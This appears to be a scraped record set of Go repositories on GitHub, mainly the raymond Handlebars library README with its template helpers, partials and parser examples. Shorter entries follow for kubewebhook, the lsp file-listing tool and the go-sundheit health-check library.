\n```\n\nWith this context and helper:\n\n```go\ntype Post struct {\n Author Person\n Body string\n Comments []Comment\n}\n\ntype Person struct {\n FirstName string\n LastName string\n}\n\ntype Comment struct {\n Author Person\n Body string\n}\n\nctx := Post{\n Person{\"Jean\", \"Valjean\"},\n \"Life is difficult\",\n []Comment{\n Comment{\n Person{\"Marcel\", \"Beliveau\"},\n \"LOL!\",\n },\n },\n}\n\nraymond.RegisterHelper(\"fullName\", func(person Person) string {\n return person.FirstName + \" \" + person.LastName\n})\n```\n\nYou can unregister global helpers with `RemoveHelper` and `RemoveAllHelpers` functions:\n\n```go\nraymond.RemoveHelper(\"fullname\")\n```\n\n```go\nraymond.RemoveAllHelpers()\n```\n\n\n### Template Helpers\n\nYou can register a helper on a specific template, and in that case that helper will be available to that template only:\n\n```go\ntpl := raymond.MustParse(\"User: {{fullName user.firstName user.lastName}}\")\n\ntpl.RegisterHelper(\"fullName\", func(firstName, lastName string) string {\n return firstName + \" \" + lastName\n})\n```\n\n\n### Built-In Helpers\n\nThose built-in helpers are available to all templates.\n\n\n#### The `if` block helper\n\nYou can use the `if` helper to conditionally render a block. If its argument returns `false`, `nil`, `0`, `\"\"`, an empty array, an empty slice or an empty map, then raymond will not render the block.\n\n```html\n
<div class=\"entry\">\n {{#if author}}\n <h1>{{firstName}} {{lastName}}</h1>\n {{/if}}\n</div>\n```\n
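\nFor a quick round trip of those falsy rules (this snippet is not from the original README and the context keys are made up), an empty slice skips the block while a non-empty string renders it:\n\n```go\n// Illustrative sketch of the falsy values listed above.\ntpl := raymond.MustParse(\"{{#if tags}}has tags{{/if}}{{#if title}}has title{{/if}}\")\n\nresult := tpl.MustExec(map[string]interface{}{\n \"tags\": []string{}, // empty slice: falsy, block is skipped\n \"title\": \"My first post\", // non-empty string: truthy, block is rendered\n})\n\nfmt.Print(result) // expected to print: has title\n```\n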
\nWhen using a block expression, you can specify a template section to run if the expression returns a falsy value. That section, marked by `{{else}}`, is called an \"else section\".\n\n```html\n
<div class=\"entry\">\n {{#if author}}\n <h1>{{firstName}} {{lastName}}</h1>\n {{else}}\n <h1>Unknown Author</h1>\n {{/if}}\n</div>
\n```\n\nYou can chain several blocks. For example that template:\n\n```html\n{{#if isActive}}\n \"Active\"\n{{else if isInactive}}\n \"Inactive\"\n{{else}}\n \"Unknown\"\n{{/if}}\n```\n\nWith that context:\n\n```go\nctx := map[string]interface{}{\n \"isActive\": false,\n \"isInactive\": false,\n}\n```\n\nOutputs:\n\n```html\n \"Unknown\"\n```\n\n\n#### The `unless` block helper\n\nYou can use the `unless` helper as the inverse of the `if` helper. Its block will be rendered if the expression returns a falsy value.\n\n```html\n
<div class=\"entry\">\n {{#unless license}}\n <h3 class=\"warning\">WARNING: This entry does not have a license!</h3>\n {{/unless}}\n</div>\n```\n
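\nAs a small usage sketch (not from the original README; the context values are made up), the warning block only renders when `license` is missing or falsy:\n\n```go\n// Illustrative round trip for the unless helper.\ntpl := raymond.MustParse(\"{{#unless license}}WARNING: no license!{{/unless}}\")\n\nfmt.Print(tpl.MustExec(map[string]interface{}{\"license\": \"MIT\"})) // expected: empty output\nfmt.Print(tpl.MustExec(map[string]interface{}{})) // expected: WARNING: no license!\n```\n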
\n\n#### The `each` block helper\n\nYou can iterate over an array, a slice, a map or a struct instance using the built-in `each` helper. Inside the block, you can use `this` to reference the element being iterated over.\n\nFor example:\n\n```html\n
<ul class=\"people\">\n {{#each people}}\n <li>{{this}}</li>\n {{/each}}\n</ul>
\n```\n\nWith this context:\n\n```go\nmap[string]interface{}{\n \"people\": []string{\n \"Marcel\", \"Jean-Claude\", \"Yvette\",\n },\n}\n```\n\nOutputs:\n\n```html\n
<ul class=\"people\">\n <li>Marcel</li>\n <li>Jean-Claude</li>\n <li>Yvette</li>\n</ul>
\n```\n\nYou can optionally provide an `{{else}}` section which will display only when the passed argument is an empty array, an empty slice or an empty map (a `struct` instance is never considered empty).\n\n```html\n{{#each paragraphs}}\n

<p>{{this}}</p>\n{{else}}\n<p class=\"empty\">No content</p>\n{{/each}}\n```\n
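\nTo see that `{{else}}` section in action (an illustrative sketch, not from the original README), executing the template above with an empty `paragraphs` slice falls through to the else block:\n\n```go\n// Illustrative: an empty slice triggers the {{else}} section of each.\ntpl := raymond.MustParse(`{{#each paragraphs}}<p>{{this}}</p>{{else}}<p class=\"empty\">No content</p>{{/each}}`)\n\nresult := tpl.MustExec(map[string]interface{}{\n \"paragraphs\": []string{},\n})\n\nfmt.Print(result) // expected: <p class=\"empty\">No content</p>\n```\n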
\nWhen looping through items in `each`, you can optionally reference the current loop index via `{{@index}}`.\n\n```html\n{{#each array}}\n {{@index}}: {{this}}\n{{/each}}\n```\n\nAdditionally for map and struct instance iteration, `{{@key}}` references the current map key or struct field name:\n\n```html\n{{#each map}}\n {{@key}}: {{this}}\n{{/each}}\n```\n\nThe first and last steps of iteration are noted via the `@first` and `@last` variables.\n
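\nAs an illustration of `@first` and `@last` (not from the original README; it assumes they can be combined with the built-in `if` helper, as in handlebars.js), this template brackets the first and last elements of a slice:\n\n```go\n// Illustrative sketch using @first / @last inside an each block.\ntpl := raymond.MustParse(\"{{#each items}}{{#if @first}}[{{/if}}{{this}}{{#if @last}}]{{/if}}{{/each}}\")\n\nresult := tpl.MustExec(map[string]interface{}{\n \"items\": []string{\"a\", \"b\", \"c\"},\n})\n\nfmt.Print(result) // expected to print something like: [abc]\n```\n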
\n\n#### The `with` block helper\n\nYou can shift the context for a section of a template by using the built-in `with` block helper.\n\n```html\n<div class=\"entry\">\n <h1>{{title}}</h1>\n\n {{#with author}}\n <h2>By {{firstName}} {{lastName}}</h2>\n {{/with}}\n</div>
\n```\n\nWith this context:\n\n```go\nmap[string]interface{}{\n \"title\": \"My first post!\",\n \"author\": map[string]string{\n \"firstName\": \"Jean\",\n \"lastName\": \"Valjean\",\n },\n}\n```\n\nOutputs:\n\n```html\n
<div class=\"entry\">\n <h1>My first post!</h1>\n\n <h2>By Jean Valjean</h2>\n</div>
\n```\n\nYou can optionally provide an `{{else}}` section which will display only when the passed argument is falsy.\n\n```html\n{{#with author}}\n

<p>{{name}}</p>\n{{else}}\n<p class=\"empty\">No content</p>
\n{{/with}}\n```\n\n\n#### The `lookup` helper\n\nThe `lookup` helper allows for dynamic parameter resolution using handlebars variables.\n\n```html\n{{#each bar}}\n {{lookup ../foo @index}}\n{{/each}}\n```\n\n\n#### The `log` helper\n\nThe `log` helper allows for logging while rendering a template.\n\n```html\n{{log \"Look at me!\"}}\n```\n\nNote that the handlebars.js `@level` variable is not supported.\n\n\n#### The `equal` helper\n\nThe `equal` helper renders a block if the string version of both arguments are equals.\n\nFor example that template:\n\n```html\n{{#equal foo \"bar\"}}foo is bar{{/equal}}\n{{#equal foo baz}}foo is the same as baz{{/equal}}\n{{#equal nb 0}}nothing{{/equal}}\n{{#equal nb 1}}there is one{{/equal}}\n{{#equal nb \"1\"}}everything is stringified before comparison{{/equal}}\n```\n\nWith that context:\n\n```go\nctx := map[string]interface{}{\n \"foo\": \"bar\",\n \"baz\": \"bar\",\n \"nb\": 1,\n}\n```\n\nOutputs:\n\n```html\nfoo is bar\nfoo is the same as baz\n\nthere is one\neverything is stringified before comparison\n```\n\n\n### Block Helpers\n\nBlock helpers make it possible to define custom iterators and other functionality that can invoke the passed block with a new context.\n\n\n#### Block Evaluation\n\nAs an example, let's define a block helper that adds some markup to the wrapped text.\n\n```html\n
<div class=\"entry\">\n <h1>{{title}}</h1>\n <div class=\"body\">\n {{#bold}}{{body}}{{/bold}}\n </div>\n</div>
\n```\n\nThe `bold` helper will add markup to make its text bold.\n\n```go\nraymond.RegisterHelper(\"bold\", func(options *raymond.Options) raymond.SafeString {\n return raymond.SafeString(`<div class=\"mybold\">` + options.Fn() + \"</div>
\")\n})\n```\n\nA helper evaluates the block content with current context by calling `options.Fn()`.\n\nIf you want to evaluate the block with another context, then use `options.FnWith(ctx)`, like this french version of built-in `with` block helper:\n\n```go\nraymond.RegisterHelper(\"avec\", func(context interface{}, options *raymond.Options) string {\n return options.FnWith(context)\n})\n```\n\nWith that template:\n\n```html\n{{#avec obj.text}}{{this}}{{/avec}}\n```\n\n\n#### Conditional\n\nLet's write a french version of `if` block helper:\n\n```go\nsource := `{{#si yep}}YEP !{{/si}}`\n\nctx := map[string]interface{}{\"yep\": true}\n\nraymond.RegisterHelper(\"si\", func(conditional bool, options *raymond.Options) string {\n if conditional {\n return options.Fn()\n }\n return \"\"\n})\n```\n\nNote that as the first parameter of the helper is typed as `bool` an automatic conversion is made if corresponding context value is not a boolean. So this helper works with that context too:\n\n```go\nctx := map[string]interface{}{\"yep\": \"message\"}\n```\n\nHere, `\"message\"` is converted to `true` because it is an non-empty string. See `IsTrue()` function for more informations on boolean conversion.\n\n\n#### Else Block Evaluation\n\nWe can enhance the `si` block helper to evaluate the `else block` by calling `options.Inverse()` if conditional is false:\n\n```go\nsource := `{{#si yep}}YEP !{{else}}NOP !{{/si}}`\n\nctx := map[string]interface{}{\"yep\": false}\n\nraymond.RegisterHelper(\"si\", func(conditional bool, options *raymond.Options) string {\n if conditional {\n return options.Fn()\n }\n return options.Inverse()\n})\n```\n\nOutputs:\n```\nNOP !\n```\n\n\n#### Block Parameters\n\nIt's possible to receive named parameters from supporting helpers.\n\n```html\n{{#each users as |user userId|}}\n Id: {{userId}} Name: {{user.name}}\n{{/each}}\n```\n\nIn this particular example, `user` will have the same value as the current context and `userId` will have the index/key value for the iteration.\n\nThis allows for nested helpers to avoid name conflicts.\n\nFor example:\n\n```html\n{{#each users as |user userId|}}\n {{#each user.books as |book bookId|}}\n User: {{userId}} Book: {{bookId}}\n {{/each}}\n{{/each}}\n```\n\nWith this context:\n\n```go\nctx := map[string]interface{}{\n \"users\": map[string]interface{}{\n \"marcel\": map[string]interface{}{\n \"books\": map[string]interface{}{\n \"book1\": \"My first book\",\n \"book2\": \"My second book\",\n },\n },\n \"didier\": map[string]interface{}{\n \"books\": map[string]interface{}{\n \"bookA\": \"Good book\",\n \"bookB\": \"Bad book\",\n },\n },\n },\n}\n```\n\nOutputs:\n\n```html\n User: marcel Book: book1\n User: marcel Book: book2\n User: didier Book: bookA\n User: didier Book: bookB\n```\n\nAs you can see, the second block parameter is the map key. 
When using structs, it is the struct field name.\n\nWhen using arrays and slices, the second parameter is element index:\n\n```go\nctx := map[string]interface{}{\n \"users\": []map[string]interface{}{\n {\n \"id\": \"marcel\",\n \"books\": []map[string]interface{}{\n {\"id\": \"book1\", \"title\": \"My first book\"},\n {\"id\": \"book2\", \"title\": \"My second book\"},\n },\n },\n {\n \"id\": \"didier\",\n \"books\": []map[string]interface{}{\n {\"id\": \"bookA\", \"title\": \"Good book\"},\n {\"id\": \"bookB\", \"title\": \"Bad book\"},\n },\n },\n },\n}\n```\n\nOutputs:\n\n```html\n User: 0 Book: 0\n User: 0 Book: 1\n User: 1 Book: 0\n User: 1 Book: 1\n```\n\n\n### Helper Parameters\n\nWhen calling a helper in a template, raymond expects the same number of arguments as the number of helper function parameters.\n\nSo this template:\n\n```html\n{{add a}}\n```\n\nWith this helper:\n\n```go\nraymond.RegisterHelper(\"add\", func(val1, val2 int) string {\n return strconv.Itoa(val1 + val2)\n})\n```\n\nWill simply panics, because we call the helper with one argument whereas it expects two.\n\n\n#### Automatic conversion\n\nLet's create a `concat` helper that expects two strings and concat them:\n\n```go\nsource := `{{concat a b}}`\n\nctx := map[string]interface{}{\n \"a\": \"Jean\",\n \"b\": \"Valjean\",\n}\n\nraymond.RegisterHelper(\"concat\", func(val1, val2 string) string {\n return val1 + \" \" + val2\n})\n```\n\nEverything goes well, two strings are passed as arguments to the helper that outputs:\n\n```html\nJean VALJEAN\n```\n\nBut what happens if there is another type than `string` in the context ? For example:\n\n```go\nctx := map[string]interface{}{\n \"a\": 10,\n \"b\": \"Valjean\",\n}\n```\n\nActually, raymond perfoms automatic string conversion. 
So because the first parameter of the helper is typed as `string`, the first argument will be converted from the `10` integer to `\"10\"`, and the helper outputs:\n\n```html\n10 VALJEAN\n```\n\nNote that this kind of automatic conversion is done with `bool` type too, thanks to the `IsTrue()` function.\n\n\n### Options Argument\n\nIf a helper needs the `Options` argument, just add it at the end of helper parameters:\n\n```go\nraymond.RegisterHelper(\"add\", func(val1, val2 int, options *raymond.Options) string {\n return strconv.Itoa(val1 + val2) + \" \" + options.ValueStr(\"bananas\")\n})\n```\n\nThanks to the `options` argument, helpers have access to the current evaluation context, to the `Hash` arguments, and they can manipulate the private data variables.\n\nThe `Options` argument is even necessary for Block Helpers to evaluate block and \"else block\".\n\n\n#### Context Values\n\nHelpers fetch current context values with `options.Value()` and `options.ValuesStr()`.\n\n`Value()` returns an `interface{}` and lets the helper do the type assertions whereas `ValueStr()` automatically converts the value to a `string`.\n\nFor example:\n\n```go\nsource := `{{concat a b}}`\n\nctx := map[string]interface{}{\n \"a\": \"Marcel\",\n \"b\": \"Beliveau\",\n \"suffix\": \"FOREVER !\",\n}\n\nraymond.RegisterHelper(\"concat\", func(val1, val2 string, options *raymond.Options) string {\n return val1 + \" \" + val2 + \" \" + options.ValueStr(\"suffix\")\n})\n```\n\nOutputs:\n\n```html\nMarcel Beliveau FOREVER !\n```\n\nHelpers can get the entire current context with `options.Ctx()` that returns an `interface{}`.\n\n\n#### Helper Hash Arguments\n\nHelpers access hash arguments with `options.HashProp()` and `options.HashStr()`.\n\n`HashProp()` returns an `interface{}` and lets the helper do the type assertions whereas `HashStr()` automatically converts the value to a `string`.\n\nFor example:\n\n```go\nsource := `{{concat suffix first=a second=b}}`\n\nctx := map[string]interface{}{\n \"a\": \"Marcel\",\n \"b\": \"Beliveau\",\n \"suffix\": \"FOREVER !\",\n}\n\nraymond.RegisterHelper(\"concat\", func(suffix string, options *raymond.Options) string {\n return options.HashStr(\"first\") + \" \" + options.HashStr(\"second\") + \" \" + suffix\n})\n```\n\nOutputs:\n\n```html\nMarcel Beliveau FOREVER !\n```\n\nHelpers can get the full hash with `options.Hash()` that returns a `map[string]interface{}`.\n\n\n#### Private Data\n\nHelpers access private data variables with `options.Data()` and `options.DataStr()`.\n\n`Data()` returns an `interface{}` and lets the helper do the type assertions whereas `DataStr()` automatically converts the value to a `string`.\n\nHelpers can get the entire current data frame with `options.DataFrame()` that returns a `*DataFrame`.\n\nFor helpers that need to inject their own private data frame, use `options.NewDataFrame()` to create the frame and `options.FnData()` to evaluate the block with that frame.\n\nFor example:\n\n```go\nsource := `{{#voodoo kind=a}}Voodoo is {{@magix}}{{/voodoo}}`\n\nctx := map[string]interface{}{\n \"a\": \"awesome\",\n}\n\nraymond.RegisterHelper(\"voodoo\", func(options *raymond.Options) string {\n // create data frame with @magix data\n frame := options.NewDataFrame()\n frame.Set(\"magix\", options.HashProp(\"kind\"))\n\n // evaluates block with new data frame\n return options.FnData(frame)\n})\n```\n\nHelpers that need to evaluate the block with a private data frame and a new context can call `options.FnCtxData()`.\n\n\n### Utilites\n\nIn addition to 
`Escape()`, raymond provides utility functions that can be usefull for helpers.\n\n\n#### `Str()`\n\n`Str()` converts its parameter to a `string`.\n\nBooleans:\n\n```go\nraymond.Str(3) + \" foos and \" + raymond.Str(-1.25) + \" bars\"\n// Outputs: \"3 foos and -1.25 bars\"\n```\n\nNumbers:\n\n``` go\n\"everything is \" + raymond.Str(true) + \" and nothing is \" + raymond.Str(false)\n// Outputs: \"everything is true and nothing is false\"\n```\n\nMaps:\n\n```go\nraymond.Str(map[string]string{\"foo\": \"bar\"})\n// Outputs: \"map[foo:bar]\"\n```\n\nArrays and Slices:\n\n```go\nraymond.Str([]interface{}{true, 10, \"foo\", 5, \"bar\"})\n// Outputs: \"true10foo5bar\"\n```\n\n\n#### `IsTrue()`\n\n`IsTrue()` returns the truthy version of its parameter.\n\nIt returns `false` when parameter is either:\n\n - an empty array\n - an empty slice\n - an empty map\n - `\"\"`\n - `nil`\n - `0`\n - `false`\n\nFor all others values, `IsTrue()` returns `true`.\n\n\n## Context Functions\n\nIn addition to helpers, lambdas found in context are evaluated.\n\nFor example, that template and context:\n\n```go\nsource := \"I {{feeling}} you\"\n\nctx := map[string]interface{}{\n \"feeling\": func() string {\n rand.Seed(time.Now().UTC().UnixNano())\n\n feelings := []string{\"hate\", \"love\"}\n return feelings[rand.Intn(len(feelings))]\n },\n}\n```\n\nRandomly renders `I hate you` or `I love you`.\n\nThose context functions behave like helper functions: they can be called with parameters and they can have an `Options` argument.\n\n\n## Partials\n\n### Template Partials\n\nYou can register template partials before execution:\n\n```go\ntpl := raymond.MustParse(\"{{> foo}} baz\")\ntpl.RegisterPartial(\"foo\", \"bar\")\n\nresult := tpl.MustExec(nil)\nfmt.Print(result)\n```\n\nOutput:\n\n```html\nbar baz\n```\n\nYou can register several partials at once:\n\n```go\ntpl := raymond.MustParse(\"{{> foo}} and {{> baz}}\")\ntpl.RegisterPartials(map[string]string{\n \"foo\": \"bar\",\n \"baz\": \"bat\",\n})\n\nresult := tpl.MustExec(nil)\nfmt.Print(result)\n```\n\nOutput:\n\n```html\nbar and bat\n```\n\n\n### Global Partials\n\nYou can registers global partials that will be accessible by all templates:\n\n```go\nraymond.RegisterPartial(\"foo\", \"bar\")\n\ntpl := raymond.MustParse(\"{{> foo}} baz\")\nresult := tpl.MustExec(nil)\nfmt.Print(result)\n```\n\nOr:\n\n```go\nraymond.RegisterPartials(map[string]string{\n \"foo\": \"bar\",\n \"baz\": \"bat\",\n})\n\ntpl := raymond.MustParse(\"{{> foo}} and {{> baz}}\")\nresult := tpl.MustExec(nil)\nfmt.Print(result)\n```\n\n\n### Dynamic Partials\n\nIt's possible to dynamically select the partial to be executed by using sub expression syntax.\n\nFor example, that template randomly evaluates the `foo` or `baz` partial:\n\n```go\ntpl := raymond.MustParse(\"{{> (whichPartial) }}\")\ntpl.RegisterPartials(map[string]string{\n \"foo\": \"bar\",\n \"baz\": \"bat\",\n})\n\nctx := map[string]interface{}{\n \"whichPartial\": func() string {\n rand.Seed(time.Now().UTC().UnixNano())\n\n names := []string{\"foo\", \"baz\"}\n return names[rand.Intn(len(names))]\n },\n}\n\nresult := tpl.MustExec(ctx)\nfmt.Print(result)\n```\n\n\n### Partial Contexts\n\nIt's possible to execute partials on a custom context by passing in the context to the partial call.\n\nFor example:\n\n```go\ntpl := raymond.MustParse(\"User: {{> userDetails user }}\")\ntpl.RegisterPartial(\"userDetails\", \"{{firstname}} {{lastname}}\")\n\nctx := map[string]interface{}{\n \"user\": map[string]string{\n \"firstname\": \"Jean\",\n 
\"lastname\": \"Valjean\",\n },\n}\n\nresult := tpl.MustExec(ctx)\nfmt.Print(result)\n```\n\nDisplays:\n\n```html\nUser: Jean Valjean\n```\n\n\n### Partial Parameters\n\nCustom data can be passed to partials through hash parameters.\n\nFor example:\n\n```go\ntpl := raymond.MustParse(\"{{> myPartial name=hero }}\")\ntpl.RegisterPartial(\"myPartial\", \"My hero is {{name}}\")\n\nctx := map[string]interface{}{\n \"hero\": \"Goldorak\",\n}\n\nresult := tpl.MustExec(ctx)\nfmt.Print(result)\n```\n\nDisplays:\n\n```html\nMy hero is Goldorak\n```\n\n\n## Utility Functions\n\nYou can use following utility fuctions to parse and register partials from files:\n\n- `ParseFile()` - reads a file and return parsed template\n- `Template.RegisterPartialFile()` - reads a file and registers its content as a partial with given name\n- `Template.RegisterPartialFiles()` - reads several files and registers them as partials, the filename base is used as the partial name\n\n\n## Mustache\n\nHandlebars is a superset of [mustache](https://mustache.github.io) but it differs on those points:\n\n- Alternative delimiters are not supported\n- There is no recursive lookup\n\n\n## Limitations\n\nThese handlebars options are currently NOT implemented:\n\n- `compat` - enables recursive field lookup\n- `knownHelpers` - list of helpers that are known to exist (truthy) at template execution time\n- `knownHelpersOnly` - allows further optimizations based on the known helpers list\n- `trackIds` - include the id names used to resolve parameters for helpers\n- `noEscape` - disables HTML escaping globally\n- `strict` - templates will throw rather than silently ignore missing fields\n- `assumeObjects` - removes object existence checks when traversing paths\n- `preventIndent` - disables the auto-indententation of nested partials\n- `stringParams` - resolves a parameter to it's name if the value isn't present in the context stack\n\nThese handlebars features are currently NOT implemented:\n\n- raw block content is not passed as a parameter to helper\n- `blockHelperMissing` - helper called when a helper can not be directly resolved\n- `helperMissing` - helper called when a potential helper expression was not found\n- `@contextPath` - value set in `trackIds` mode that records the lookup path for the current context\n- `@level` - log level\n\n\n## Handlebars Lexer\n\nYou should not use the lexer directly, but for your information here is an example:\n\n```go\npackage main\n\nimport (\n \"fmt\"\n\n \"github.com/aymerick/raymond/lexer\"\n)\n\nfunc main() {\n source := \"You know {{nothing}} John Snow\"\n\n output := \"\"\n\n lex := lexer.Scan(source)\n for {\n // consume next token\n token := lex.NextToken()\n\n output += fmt.Sprintf(\" %s\", token)\n\n // stops when all tokens have been consumed, or on error\n if token.Kind == lexer.TokenEOF || token.Kind == lexer.TokenError {\n break\n }\n }\n\n fmt.Print(output)\n}\n```\n\nOutputs:\n\n```\nContent{\"You know \"} Open{\"{{\"} ID{\"nothing\"} Close{\"}}\"} Content{\" John Snow\"} EOF\n```\n\n\n## Handlebars Parser\n\nYou should not use the parser directly, but for your information here is an example:\n\n```go\npackage main\n\nimport (\n \"fmt\"\n\n \"github.com/aymerick/raymond/ast\"\n \"github.com/aymerick/raymond/parser\"\n)\n\nfu nc main() {\n source := \"You know {{nothing}} John Snow\"\n\n // parse template\n program, err := parser.Parse(source)\n if err != nil {\n panic(err)\n }\n\n // print AST\n output := ast.Print(program)\n\n fmt.Print(output)\n}\n```\n\nOutputs:\n\n```\nCONTENT[ 
'You know ' ]\n{{ PATH:nothing [] }}\nCONTENT[ ' John Snow' ]\n```\n\n\n## Test\n\nFirst, fetch mustache tests:\n\n $ git submodule update --init\n\nTo run all tests:\n\n $ go test ./...\n\nTo filter tests:\n\n $ go test -run=\"Partials\"\n\nTo run all test and all benchmarks:\n\n $ go test -bench . ./...\n\nTo test with race detection:\n\n $ go test -race ./...\n\n\n## References\n\n - \n - \n - \n - \n\n\n## Others Implementations\n\n- [handlebars.js](http://handlebarsjs.com) - javascript\n- [handlebars.java](https://github.com/jknack/handlebars.java) - java\n- [handlebars.rb](https://github.com/cowboyd/handlebars.rb) - ruby\n- [handlebars.php](https://github.com/XaminProject/handlebars.php) - php\n- [handlebars-objc](https://github.com/Bertrand/handlebars-objc) - Objective C\n- [rumblebars](https://github.com/nicolas-cherel/rumblebars) - rust\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "slok/kubewebhook", "link": "https://github.com/slok/kubewebhook", "tags": ["kubernetes", "webhooks", "controller", "mutating", "validating", "admission", "k8s", "apiserver"], "stars": 512, "description": "Go framework to create Kubernetes mutating and validating webhooks", "lang": "Go", "repo_lang": "", "readme": "", "readme_type": "text", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "dborzov/lsp", "link": "https://github.com/dborzov/lsp", "tags": ["ls", "filemanager", "unix"], "stars": 512, "description": "lsp is like ls command but more human-friendly", "lang": "Go", "repo_lang": "", "readme": "## lsp: list files in a mildly human-frendlier manner\n[![Build Status](https://travis-ci.org/dborzov/lsp.svg?branch=master)](https://travis-ci.org/dborzov/lsp)\n\n`lsp` lists files, like [`ls`](http://en.wikipedia.org/wiki/Ls) command,\nbut it does not attempt to meet\nthat archaic POSIX specification, so instead of this:\n```\n(bash)$ ls -l\n\ntotal 16\n-rw-r--r-- 1 peterborzov staff 1079 9 Aug 00:22 LICENSE\n-rw-r--r-- 1 peterborzov staff 60 9 Aug 00:22 README.md\n```\n\nyou get this:\n![screenshot](https://raw.githubusercontent.com/dborzov/lsp/screenshots/symlinks.png)\n\n## Features\n#### File Groups\nFiles grouped by type (with `-l` key or in modes when file type not shown). `lsp` distinguishes binary, text and executable files, symlinks and is aware of weird types like devices and unix socket thingy:\n![lsp can show files grouped by type](https://raw.githubusercontent.com/dborzov/lsp/screenshots/grouped.png)\n#### Modification time in human-friendly format\n`-t` key for when you are interested in modification time. 
It turns to the mode that makes most sense to me when I want to look up modtimes, sorted within file groups from recent to latest:\n![](https://raw.githubusercontent.com/dborzov/lsp/screenshots/modtime.png)\nSometimes relative times are not very readible as well (like when you are interested in a specific date), use two flags `-sl` to show the full UTC timestamp in properties.\n#### Size in human-friendly format\n`-s` key, similarly to modtime key, shows file sizes and sorts within file groups from largest to smallest:\n![](https://raw.githubusercontent.com/dborzov/lsp/screenshots/size.png)\n\n#### Async Timeout\nThe file information is collected asynchronously, BFS-like, with a separate thread for each file and a timeout threshold.\n\nThat means that the execution is not going to freeze because of some low-response device driver (like external hard drive or optical drive) or collecting info about a huge directory.\n\n#### Align by left\nI have been playing with aligning files and descriptions by center, and I like that you can see files with the same extension right away, but there are deifinitely cases when it gets weird.\nFor now, there is `-p` key to render the file table in the left-aligned columns:\n![](https://raw.githubusercontent.com/dborzov/lsp/screenshots/table.png)\n\n\n## Todo before v1.0\n- [ ] Rewrite outline formatting: with the current design too much space is wasted, long filenames break things\n- [x] Mark executable files as such\n- Think about how to represent file rights and ownership\n- Approach hidden and generated files as outlined in [issue#3](https://github.com/dborzov/lsp/issues/3)\n- Better test coverage\n- Expand in this README on philosophy of the project (tool in the unix way, minimize surprises, nothing's to be configurable)\n- Think of TODO list points\n\nGithub Issues and pull requests are very welcome, feel free to [message me](tihoutrom@gmail.com) if you are considering contributing.\nSee [CONTRIBUTING.md](CONTRIBUTING.md) for intro to the codebase\n\n\n## Installation\n\n`lsp` is written in the `go` programming language.\nIt can be installed using `go get`.\n\n```\n $ go get github.com/dborzov/lsp\n```\n\nThen make sure that your `$PATH` includes the `$GOPATH/bin` directory.\nTo do that, you can put this line your `~/.bash_profile` or `.zshrc`:\n```\nexport PATH=$PATH:$GOPATH/bin\n```\n\nOnce it becomes more functional, `lsp` will be distributed in native binaries\n(without dependencies) for all platforms (Linux, MacOS, Windows).\n\n## Misc\nMIT license.\n", "readme_type": "markdown", "hn_comments": "While I hesitate to augment core functionality with something before its untested, I do think this looks pretty awesome and is exactly what I want 'ls' to perform like. Nice work, looking forward to future versions.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "AppsFlyer/go-sundheit", "link": "https://github.com/AppsFlyer/go-sundheit", "tags": [], "stars": 512, "description": "A library built to provide support for defining service health for golang services. 
It allows you to register async health checks for your dependencies and the service itself, provides a health endpoint that exposes their status, and health metrics.", "lang": "Go", "repo_lang": "", "readme": "# go-sundheit\n[![Actions Status](https://github.com/AppsFlyer/go-sundheit/workflows/go-build/badge.svg)](https://github.com/AppsFlyer/go-sundheit/actions)\n[![CircleCI](https://circleci.com/gh/AppsFlyer/go-sundheit.svg?style=svg)](https://circleci.com/gh/AppsFlyer/go-sundheit)\n[![Coverage Status](https://coveralls.io/repos/github/AppsFlyer/go-sundheit/badge.svg?branch=master)](https://coveralls.io/github/AppsFlyer/go-sundheit?branch=master)\n[![Go Report Card](https://goreportcard.com/badge/github.com/AppsFlyer/go-sundheit)](https://goreportcard.com/report/github.com/AppsFlyer/go-sundheit)\n[![Godocs](https://img.shields.io/badge/golang-documentation-blue.svg)](https://godoc.org/github.com/AppsFlyer/go-sundheit)\n[![Mentioned in Awesome Go](https://awesome.re/mentioned-badge.svg)](https://github.com/avelino/awesome-go) \n\n\n\nA library built to provide support for defining service health for golang services.\nIt allows you to register async health checks for your dependencies and the service itself, \nand provides a health endpoint that exposes their status.\n\n## What's go-sundheit?\nThe project is named after the German word `Gesundheit` which means \u2018health\u2019, and it is pronounced `/\u0261\u0259\u02c8z\u028ant\u02ccha\u026a\u032ft/`.\n\n## Installation\nUsing go modules:\n```\ngo get github.com/AppsFlyer/go-sundheit@v0.5.0\n```\n\n## Usage\n```go\nimport (\n\t\"net/http\"\n\t\"time\"\n\t\"log\"\n\n\t\"github.com/pkg/errors\"\n\t\"github.com/AppsFlyer/go-sundheit\"\n\n\thealthhttp \"github.com/AppsFlyer/go-sundheit/http\"\n\t\"github.com/AppsFlyer/go-sundheit/checks\"\n)\n\nfunc main() {\n\t// create a new health instance\n\th := gosundheit.New()\n\t\n\t// define an HTTP dependency check\n\thttpCheckConf := checks.HTTPCheckConfig{\n\t\tCheckName: \"httpbin.url.check\",\n\t\tTimeout: 1 * time.Second,\n\t\t// dependency you're checking - use your own URL here...\n\t\t// this URL will fail 50% of the times\n\t\tURL: \"http://httpbin.org/status/200,300\",\n\t}\n\t// create the HTTP check for the dependency\n\t// fail fast when you misconfigured the URL. Don't ignore errors!!!\n\thttpCheck, err := checks.NewHTTPCheck(httpCheckConf)\n\tif err != nil {\n\t\tfmt.Println(err)\n\t\treturn // your call...\n\t}\n\n\t// Alternatively panic when creating a check fails\n\thttpCheck = checks.Must(checks.NewHTTPCheck(httpCheckConf))\n\n\terr = h.RegisterCheck(\n\t\thttpCheck,\n\t\tgosundheit.InitialDelay(time.Second), // the check will run once after 1 sec\n\t\tgosundheit.ExecutionPeriod(10 * time.Second), // the check will be executed every 10 sec\n\t)\n\t\n\tif err != nil {\n\t\tfmt.Println(\"Failed to register check: \", err)\n\t\treturn // or whatever\n\t}\n\n\t// define more checks...\n\t\n\t// register a health endpoint\n\thttp.Handle(\"/admin/health.json\", healthhttp.HandleHealthJSON(h))\n\t\n\t// serve HTTP\n\tlog.Fatal(http.ListenAndServe(\":8080\", nil))\n}\n```\n### Using `Option` to Configure `Health` Service\nTo create a health service, it's simple as calling the following code:\n```go\ngosundheit.New(options ...Option)\n```\nThe optional parameters of `options` allows the user to configure the Health Service by passing configuration functions (implementing `Option` signature). \nAll options are marked with the prefix `WithX`. 
